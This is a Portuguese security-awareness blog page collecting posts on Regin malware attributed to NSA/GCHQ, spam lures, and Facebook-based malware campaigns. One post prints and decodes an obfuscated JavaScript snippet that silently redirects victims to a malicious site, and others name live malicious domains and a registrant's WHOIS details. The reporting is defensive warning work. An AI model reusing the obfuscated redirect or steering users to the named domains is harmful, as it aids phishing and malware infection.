Todos os posts tagados malware

NSA e GCHQ lançam ataques à Europa

10530873-european-union-logo

Num ano em que o mundo foi abalado pelas revelações chocantes de Edward Snowden, por intermédio do novo jornal digital The Intercept [2] (financiado por Pierre Omidyar, fundador da eBay) e com a ajuda do Wikileaks – chegam mais revelações.

Meses atrás foi detectado um malware que afetou a rede inteira da Belgacom, a principal telecom da Bélgica. O seu objetivo era desconhecido (mas expectável), tal como a sua proveniência.

Na semana passada, o The Intercept  revelou que as suas fontes industriais confirmam o que alguns já suspeitavam – que o ataque feito à Belgacom e outras instituições europeias como o Parlamento Europeu e outras agências ligadas à União Europeia, foram levadas a cabo por nada mais do que a NSA e a GCHQ (a contraparte da NSA do Reino Unido).

No entanto o malware em si nunca foi identificado até recentemente.

Apelidado de Regin, tem como objetivo principal infiltrar os computadores dos referidos alvos, extraindo o máximo possível de informação e ao mesmo tempo permanecendo totalmente escondido, mascarando-se como qualquer outra aplicação válida da Microsoft (e.g. um update do Windows).

Os primeiros a reportar e analisar o dito malware foi a empresa de segurança Symantec (conhecidos pelo Norton Anti-Virus), que descreveu que entre outras propriedades, este seria o “malware mais sofisticado de sempre” e “comparável ao Stuxnet” – um exemplo de outro malware produzido pelas ditas agências  secretas, cujos alvo eram as instalações nucleares do Irão, de forma a causar danos nas centrifugadoras de Urânio – essencialmente tornando-as inúteis.

Por razões políticas – a própria Belgacom (sendo parcialmente propriedade e gerida pelo governo) não comenta o ataque ou as implicações deste, apenas tendo referido que “partilharam e facilitaram todos os dados possíveis sobre o malware” e que está em curso uma investigação criminal a partir da invasão.

Como esperado, ambas as agencias de espionagem responderam entre linhas a negação completa e responsabilidade dos ataques.

De referir que não é a primeira vez que um ataque deste género é feito – totalmente patrocinado e organizado por um governo inteiro (conhecido como um Nation State attack); é criado de raiz, com um propósito específico e para um determinado alvo.

Para além do referido Stuxnet, é sabido que a China tem vindo a desenvolver, atacar e espiar cada vez mais usando malwares com propósitos semelhantes  – assim como a Rússia.

Numa altura em que o cidadão comum batalha contra ataques diários, prontos para surripiar qualquer dado privado ou dados bancários que lhe sirvam como lucro – temos igualmente que estar preocupados com a nuvem negra que se aproxima no céu e que chegou à Europa, roubando indiscriminadamente e ilegalmente dados de muitos cidadãos Europeus.

Este é o primeiro de alguns artigos onde vamos abordar com mais atenção não só o malware em si, mas sobretudo as implicações geopolíticas e o impacto futuro da politica de exfiltração de dados ilegais pela parte dos governos Americanos e Ingleses.

Nesse seguimento, o WebSegura já iniciou também contactos com representantes e fontes académicas na Bélgica, peritos na área, das quais esperemos publicar no futuro.

Convidamos também os utilizadores a entrar no debate e acompanhar este tema,  tomando conhecimento do problema: independentemente da sua proteção, se algum destes governos quiser infiltrar e roubar toda a sua informação consegue – isto assumindo que já não a tem toda :)

Morte do Robin Williams serve de isco para vírus

Morte do actor Robin Williams serve de isco para vírus

Diversas campanhas de spam estão a circular com a mensagem de poder ver um vídeo do Robin Williams com as últimas palavras do actor/comediante.
É uma prova que os utilizadores maliciosos acompanham as últimas tendências (muitos com sistemas automáticos de leitura do Google Trends) para propagar malware e atingir os seus objectivos.

No email que tive acesso, é possível ver uma imagem do Robin Williams juntamente com o assunto:

Robin Williams Dies, See His Last Words On Video

O email inclui um link (codificado em hexadecimal quando passamos com o cursor do rato) para um site malicioso com um payload para descarregar uma actualização do Flash Player (malware).

Se por acaso recebeu este email e instalou este malware, deverá removê-lo rapidamente utilizando o seu antivirus.

Malware colorproface.net circula no Facebook

colorproface

Um novo malware está a ser propagado no Facebook. A mensagem está a ser publicada em diversos grupos do Facebook e utilizadores infetados estão a tornar este malware viral.

A mensagem que transmite este malware é:

Olha que interessante essas novas cores pro facebook.
http://colorproface.net

O domínio colorproface.net foi registado no GoDaddy com a seguinte informação:

Creation Date: 2014-06-09 14:00:54
Registry Registrant ID:
Registrant Name: manusclecio albuquerque
Registrant Organization: hwuaye
Registrant Street: rua maria da penha 2379
Registrant City: Belem
Registrant State/Province: Para
Registrant Postal Code: 00000-000
Registrant Country: Brazil
Registrant Phone: +55.0
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

O site apresenta malware, o que significa que a própria visita poderá infectar o seu sistema.

script_malicioso

Basicamente este código javascript ofuscado, carrega um iframe para tentar o download de um ficheiro malicioso intitulado de coresparaseuface.exe.

Submeti a amostra ao VirusTotal e reparei na baixa taxa de deteção deste ficheiro. É bastante perigoso.

O malware, para além de realmente mudar as cores do Facebook, efetua alterações nocivas no registo do sistema operativo Windows.
Algumas pistas indicam ser um malware de origem brasileira, como já é habitual pelo idioma partilhado.

Fica o meu agradecimento ao nosso parceiro Miúdos Seguros na Net pela divulgação desta fraude.

Falsa notificação do Facebook leva a malware

Falsa notificação do Facebook leva a malware

Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.

Assunto do email:

[Username], you have pending messages

Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:

ip_malicioso/~up1adstop/coldness.php

O código-fonte deste site (ofuscado):

bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);

… que depois de traduzido reencaminha para outro site malicioso:

setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);

De referir que o primeiro url é detectado pelos antivirus online  com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.

No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.

Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.

Transmissão online do Porto vs Benfica leva a malware

Transmissão online do Porto - Benfica leva a malware

Fica o alerta para os diversos links de supostas transmissões online do jogo de futebol Porto – Benfica, que irá ser transmitido hoje na Sport TV.
Alguns deles até podem mostrar o jogo mas ao mesmo tempo inundam a página com adware/malware.
Neste tipo de esquemas também já começam aparecer links com Likejacking, onde o utilizador ao clicar no botão Play, também está a Gostar de uma página/link no Facebook para poder ver a transmissão pirata. Desta forma este esquema propaga-se pela lista de amigos da vítima.

Tenham sempre em atenção os links que abrem e verifiquem sempre a sua veracidade.
Fica a dica.